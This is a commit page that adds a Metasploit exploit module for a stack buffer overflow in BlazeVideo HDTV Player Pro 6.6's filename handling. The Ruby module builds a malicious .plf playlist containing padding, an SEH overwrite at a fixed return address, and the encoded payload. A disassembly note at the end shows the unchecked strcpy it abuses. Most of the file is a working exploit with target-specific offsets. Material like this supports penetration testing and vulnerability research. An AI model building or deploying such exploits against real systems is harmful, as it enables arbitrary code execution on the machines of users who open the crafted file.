Add OSVDB-80896 BlazeVideo HDTV Player Pro 6.6 Buffer Overflow
parent
213b3352fa
commit
37f731fe7d
|
@ -0,0 +1,111 @@
|
||||||
|
##
|
||||||
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
# Framework web site for more information on licensing and terms of use.
|
||||||
|
# http://metasploit.com/framework/
|
||||||
|
##
|
||||||
|
|
||||||
|
require 'msf/core'
|
||||||
|
|
||||||
|
class Metasploit3 < Msf::Exploit::Remote
|
||||||
|
Rank = NormalRanking
|
||||||
|
|
||||||
|
include Msf::Exploit::FILEFORMAT
|
||||||
|
include Msf::Exploit::Remote::Seh
|
||||||
|
|
||||||
|
def initialize(info={})
|
||||||
|
super(update_info(info,
|
||||||
|
'Name' => "BlazeVideo HDTV Player Pro v6.6 Filename Handling Vulnerability",
|
||||||
|
'Description' => %q{
|
||||||
|
This module exploits a vulnerability found in BlazeVideo HDTV Player's filename
|
||||||
|
handling routine. When supplying a string of input data embedded in a .plf file,
|
||||||
|
the MediaPlayerCtrl.dll component will try to extract a filename by using
|
||||||
|
PathFindFileNameA(), and then copies whatever the return value is on the stack by
|
||||||
|
using an inline strcpy. As a result, if this input data is long enough, it can cause
|
||||||
|
a stack-based buffer overflow, which may lead to arbitrary code execution under the
|
||||||
|
context of the user.
|
||||||
|
},
|
||||||
|
'License' => MSF_LICENSE,
|
||||||
|
'Author' =>
|
||||||
|
[
|
||||||
|
'b33f', #Original
|
||||||
|
'sinn3r' #Metasploit
|
||||||
|
],
|
||||||
|
'References' =>
|
||||||
|
[
|
||||||
|
['OSVDB', '80896'],
|
||||||
|
['EDB', '18693'],
|
||||||
|
['EDB', '22931']
|
||||||
|
],
|
||||||
|
'Payload' =>
|
||||||
|
{
|
||||||
|
'BadChars' => "\x00\x0a\x1a\x2f\x3a\x5c",
|
||||||
|
'StackAdjustment' => -3500
|
||||||
|
},
|
||||||
|
'DefaultOptions' =>
|
||||||
|
{
|
||||||
|
'ExitFunction' => "seh"
|
||||||
|
},
|
||||||
|
'Platform' => 'win',
|
||||||
|
'Targets' =>
|
||||||
|
[
|
||||||
|
# MediaPlayerCtrl.dll P/P/R
|
||||||
|
# Tested on: Windows 7 SP1/SP0, Windows XP SP3 / Windows Vista SP2/SP1/SP0
|
||||||
|
['BlazeVideo HDTV Player Pro v6.6.0.3', {'Ret'=>0x64020327, 'Offset'=>868}]
|
||||||
|
],
|
||||||
|
'Privileged' => false,
|
||||||
|
'DisclosureDate' => "Apr 03 2012",
|
||||||
|
'DefaultTarget' => 0))
|
||||||
|
|
||||||
|
register_options(
|
||||||
|
[
|
||||||
|
OptString.new('FILENAME', [ false, 'The file name.', 'msf.plf'])
|
||||||
|
], self.class)
|
||||||
|
end
|
||||||
|
|
||||||
|
def exploit
|
||||||
|
c = ''
|
||||||
|
|
||||||
|
buf = 'http://'
|
||||||
|
buf << rand_text_alpha_upper(target['Offset'])
|
||||||
|
buf << generate_seh_record(target.ret)
|
||||||
|
buf << payload.encoded
|
||||||
|
buf << rand_text_alpha(5000-buf.length)
|
||||||
|
|
||||||
|
print_status("Creating '#{datastore['FILENAME']}'...")
|
||||||
|
file_create(buf)
|
||||||
|
end
|
||||||
|
end
|
||||||
|
|
||||||
|
=begin
|
||||||
|
Version: HDTV Player Professional v6.6
|
||||||
|
|
||||||
|
In MediaPlayerCtrl.dll (File version: 2.0.0.2; Product version: 2.0.0.2)
|
||||||
|
.text:6400E574 mov eax, [esp+138h+Source]
|
||||||
|
.text:6400E578 mov edx, [ebp+0ECh]
|
||||||
|
.text:6400E57E push eax
|
||||||
|
.text:6400E57F push eax ; pszPath <-- Our URL
|
||||||
|
.text:6400E580 mov edi, [edx]
|
||||||
|
.text:6400E582 call ebx ; PathFindFileNameA
|
||||||
|
.text:6400E584 mov ecx, [ebp+0ECh]
|
||||||
|
.text:6400E58A push eax ; File path to copy
|
||||||
|
.text:6400E58B push esi
|
||||||
|
.text:6400E58C push 1
|
||||||
|
.text:6400E58E call dword ptr [edi] ; 0x6400f1f0
|
||||||
|
|
||||||
|
0x6400F1F0 (no length check either) goes down to 0x6400F670:
|
||||||
|
|
||||||
|
int __thiscall sub_6400F670(int this, int a2, int a3, const char *source, const char *a5)
|
||||||
|
{
|
||||||
|
...
|
||||||
|
|
||||||
|
v5 = this;
|
||||||
|
if ( a2 && source && a5 )
|
||||||
|
{
|
||||||
|
memset(&buffer, 0, '\x02\x10');
|
||||||
|
v16 = *(this + 4);
|
||||||
|
*(this + 4) = v16 + 1;
|
||||||
|
v18 = a3;
|
||||||
|
buffer = a2;
|
||||||
|
strcpy(&Dest2, source); // <-- This is a rep movs
|
||||||
|
=end
|
Loading…
Reference in New Issue